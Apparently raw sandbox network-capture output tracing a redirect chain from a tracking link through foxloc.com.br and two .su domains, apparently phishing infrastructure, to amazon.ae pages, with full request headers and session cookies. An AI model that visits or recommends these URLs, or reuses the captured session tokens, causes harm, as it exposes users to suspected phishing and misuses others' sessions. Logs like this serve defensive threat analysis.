    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/ HTTP/1.1Host: aeromexico.playable.videoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g63a/Gcgaming/423184/ HTTP/1.1Host: foxloc.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /0/index.xml HTTP/1.1Host: foxloc.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://foxloc.com.br/g63a/Gcgaming/423184/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /0/index.xslt HTTP/1.1Host: foxloc.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/css,*/*;q=0.1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: xsltReferer: https://foxloc.com.br/0/index.xmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: foxloc.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://foxloc.com.br/0/index.xmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /DJuy2C6F/ HTTP/1.1Host: eff.contempi.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://foxloc.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: eff.contempi.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eff.contempi.su/DJuy2C6F/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZKbTZDWG1iU1pZSEg0UDBsMUcwclE9PSIsInZhbHVlIjoibGxlenh6RE9VbldaVllOamUwK3dPaExuMVBFbU9wVDBOZWpVRy80aVhWMjMyU3lxMEhlZmFaSGZ5R0crcm9MVWFOZWdpSzdyV0N6eUVNRmdweUc1UGNLeDk2a3hQaHFDOHFhOXd5YzNJbjUwSktuWUNmd2Fha21RaVdjSlFKeFAiLCJtYWMiOiIyNWFiYTA4MmQ5MjM2YjJjYWEyY2RhYWE3YzMwMDZiZGVmZGIxZmFiZWM4MzcyMTJmNTBkM2U0MTRiYmEyZDI1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im5IOTBzKyt0ZmJPdk9YaTJqaDV1MFE9PSIsInZhbHVlIjoiRzN3alZwaENRQjMyS1ZvaTZlNHJGUFpWOWxqMG8ycXgyd09Bek0rd3poQ1NBS3Y4UldsYVBzVmZJK1JxWVp6bjMvbFIwTWlzclFDSVRLNXJSM3NyUEVpdzhUQTZpbXBkTjFsMy9BZ3ArR2VCaWZFZVFpcFowLzRML00xUjRWMVciLCJtYWMiOiJhMTRiMzhkMDJiZDY3MGJiMWFmNDVkNWY4NmU4ZTQ0ODAzMjJiM2UyNDEwZmU2ZjdhYmYzNTNlNTU4NzU2NmNiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: foxloc.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA HTTP/1.1Host: ygbz.prosolmi.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://eff.contempi.suSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eff.contempi.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA HTTP/1.1Host: ygbz.prosolmi.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,51u4GJlQjiL.css,118zqOsmV-L.css,31-P1-9TebL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712472_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DXRRBVETR66S3T97BM5KF:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
